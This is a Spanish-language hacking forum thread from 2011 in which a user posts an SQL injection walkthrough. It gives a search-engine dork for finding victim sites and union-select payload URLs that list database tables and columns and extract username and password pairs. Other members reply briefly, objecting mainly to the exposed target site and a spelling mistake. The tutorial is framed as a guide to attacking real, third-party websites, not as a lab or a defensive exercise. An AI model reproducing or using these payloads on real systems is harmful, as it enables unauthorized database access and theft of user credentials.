elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  sqli+bug+exploit=videotuto
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: sqli+bug+exploit=videotuto  (Leído 3,632 veces)
ruben_linux

Desconectado Desconectado

Mensajes: 138



Ver Perfil WWW
sqli+bug+exploit=videotuto
« en: 25 Agosto 2011, 23:47 pm »

Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

 +and+1=0

3.- buscamos union select

Citar

4.- buscamos las tablas

Citar
http://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citar
http://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citar
   vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

« Última modificación: 26 Agosto 2011, 01:10 am por ruben_linux » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #1 en: 26 Agosto 2011, 00:18 am »

1. No tiene nada de nuevo.
2. No creo que sea necesario ponerle el hosting.
3. ...
En línea

Te vendería mi talento por poder dormir tranquilo.
‭lipman


Desconectado Desconectado

Mensajes: 3.062



Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #2 en: 26 Agosto 2011, 00:31 am »

Interesante.. pero dejame decirte que creo que no está permitido publicar la web vulnerable cuando se hacen este tipo de cosas.

De todos modos, no es que esté muy explicado que digamos =/
En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #3 en: 26 Agosto 2011, 02:54 am »

A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)
En línea

ruben_linux

Desconectado Desconectado

Mensajes: 138



Ver Perfil WWW
Re: sqli+bug+exploit=videotuto
« Respuesta #4 en: 26 Agosto 2011, 13:05 pm »

A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)

Gracias WarGhost. Ya lo cambie.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
vIDEOTUTO Registro Y OBtención de HOSTING INglés
Tutoriales - Documentación
TaN€R 1 5,538 Último mensaje 29 Marzo 2005, 08:03 am
por ¤ Nerviozzo ¤
[Metasploit] JAVA_basicservice (Videotuto by Metasploiter)
Hacking
illera88 3 4,539 Último mensaje 14 Diciembre 2010, 12:56 pm
por l1vv3r
[Videotuto] Exploit local linux 32 y 64 bits « 1 2 3 4 »
Bugs y Exploits
illera88 35 19,684 Último mensaje 17 Marzo 2011, 23:39 pm
por M3st4ng
[VideoTuto] Instalar VB6 en Win7 x64
Programación Visual Basic
RoX7 1 3,444 Último mensaje 30 Marzo 2011, 20:52 pm
por ntaryl
Identificar posibles fallos en una web (SQLi o Exploit)
Bugs y Exploits
alkage 4 5,415 Último mensaje 3 Agosto 2014, 21:03 pm
por alkage
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines